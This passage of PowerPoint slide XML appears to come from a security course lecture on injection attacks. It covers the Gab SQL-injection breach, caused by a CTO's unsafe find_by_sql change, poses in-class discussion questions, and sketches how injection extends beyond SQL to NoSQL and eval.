                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3857BA1-E983-1342-AAE4-FDEB89E86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81" y="586854"/>
            <a:ext cx="3722332" cy="20938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2D6D52BC-76BF-B347-AAB0-C2C565B1DD8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4247013" y="428767"/>
            <a:ext cx="7294696" cy="1686635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">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E02E835A-4A48-054C-BCAF-F63D6C3578E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4465598" y="2411433"/>
            <a:ext cx="7201721" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The data… was provided by an unidentified hacker who breached Gab by exploiting a SQL-injection vulnerability in its code.</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37345CF-0548-A64A-9097-AEFEA31B2F24}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6677938" y="2916833"/>
              <a:ext cx="2777040" cy="81000"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="Ink 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C37345CF-0548-A64A-9097-AEFEA31B2F24}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6588298" y="2737193"/>
                <a:ext cx="2956680" cy="440640"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B94D799D-F155-A44A-A596-48B88EF80FC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4534134" y="3472292"/>
            <a:ext cx="7007575" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Vulnerability was introduced by the site’s CTO due to a “rookie coding mistake”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09853730-E65F-AD4C-812D-D1C904CF0AAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650290" y="3544772"/>
            <a:ext cx="3815307" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Edit (preserved in git commit) strips out calls to filter/reject API and replaces them with a call to an unsafe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>find_by_sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> method</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EF967AA-6220-1546-A27D-A3D222A2DA21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4676823" y="4274908"/>
            <a:ext cx="5815212" cy="1798346"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B8D054B-6055-6447-AD85-4D4D0C44FDC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2735844" y="4905613"/>
            <a:ext cx="1533960" cy="709920"/>
            <a:chOff x="2735844" y="4905613"/>
            <a:chExt cx="1533960" cy="70992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1905292-56C4-D34B-B3C7-B5A0B8D41A5B}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2735844" y="4905613"/>
                <a:ext cx="1516320" cy="529560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="13" name="Ink 12">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81905292-56C4-D34B-B3C7-B5A0B8D41A5B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId8"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2718204" y="4887973"/>
                  <a:ext cx="15519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ADFEADF-94F4-5448-8547-1F5B60A874A2}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3856164" y="5476573"/>
                <a:ext cx="413640" cy="138960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="14" name="Ink 13">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FADFEADF-94F4-5448-8547-1F5B60A874A2}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId10"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3838164" y="5458933"/>
                  <a:ext cx="449280" cy="174600"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8F73EDE-E68A-DF49-81E2-59C24F7B32FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2571591" y="6141952"/>
            <a:ext cx="9376011" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>arstechnica.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>/gadgets/2021/03/rookie-coding-mistake-prior-to-gab-hack-came-from-sites-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>cto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25595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3AF7-0417-A747-B9A2-C602B60D6F8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In-Class Exercise	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85EE6357-CEB0-E647-85FD-F7496C90CCB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10261600" y="6356352"/>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7E18B0-8BB8-2D4F-A7C9-E4F9ACDE474E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A03EF25C-EF64-E444-A90C-FB81B04E7D63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1279478" y="3243607"/>
            <a:ext cx="9691806" cy="1219211"/>
          </a:xfr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a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>(2) If you could re-design SQL from scratch, how would you change it to make injection attacks less likely? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01A854B1-A199-5947-B93A-6D793644B009}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1279478" y="2014194"/>
            <a:ext cx="9691806" cy="543067"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx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Font typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
              <a:defRPr kumimoji="1"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accent2"/>
              </a:buClr>
              <a:buChar char="•"/>
              <a:defRPr kumimoji="1" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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kumimoji="1" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buChar char="•"/>
              <a:defRPr kumimoji="1" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buChar char="–"/>
              <a:defRPr kumimoji="1" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buChar char="–"/>
              <a:defRPr kumimoji="1" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buChar char="–"/>
              <a:defRPr kumimoji="1" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buChar char="–"/>
              <a:defRPr kumimoji="1" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buChar char="–"/>
              <a:defRPr kumimoji="1" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0" dirty="0"/>
              <a:t>(1) Does same-origin policy prevent SQL injection?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3572984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3AF7-0417-A747-B9A2-C602B60D6F8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not Just SQL!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85EE6357-CEB0-E647-85FD-F7496C90CCB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10261600" y="6356352"/>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7E18B0-8BB8-2D4F-A7C9-E4F9ACDE474E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82FB39B4-4B57-BF40-951A-F28FA481FFAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3528760" y="2654397"/>
            <a:ext cx="1851789" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Front end</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37C94FB3-146C-8843-BCE7-476CFB463190}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7842438" y="2588050"/>
            <a:ext cx="1744388" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Back end</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EB8EA20-6E67-144A-B5F6-A334E1789E7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="843139" y="2731272"/>
            <a:ext cx="952505" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DE7D5E6-F297-D748-A790-56DF7C785B99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3468001" y="3752819"/>
            <a:ext cx="2103979" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Forms a string containing user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF0DBC03-0163-084B-AB29-6F6C4D4D4A38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7828294" y="3721025"/>
            <a:ext cx="2598711" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Executes this string as a command or query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9F89C5C-F856-A747-AB14-9197BB4D60E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9719387" y="1964084"/>
            <a:ext cx="1662635" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NoSQL storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>eval(…)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 4" descr="Devil Icons Matt - Free vector graphic on Pixabay">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3E7553F-4619-8D44-B69C-7BFF4DE1E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39" y="3784613"/>
            <a:ext cx="990886" cy="7763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A207A69-571C-8645-808A-ED7720710755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2033989" y="4029941"/>
            <a:ext cx="1156320" cy="280800"/>
            <a:chOff x="2918831" y="4029908"/>
            <a:chExt cx="1156320" cy="28080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06C85A14-BC81-A246-A037-6468C497F41D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2918831" y="4029908"/>
                <a:ext cx="1152720" cy="132120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="14" name="Ink 13">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06C85A14-BC81-A246-A037-6468C497F41D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId4"/>
                <a:stretch>
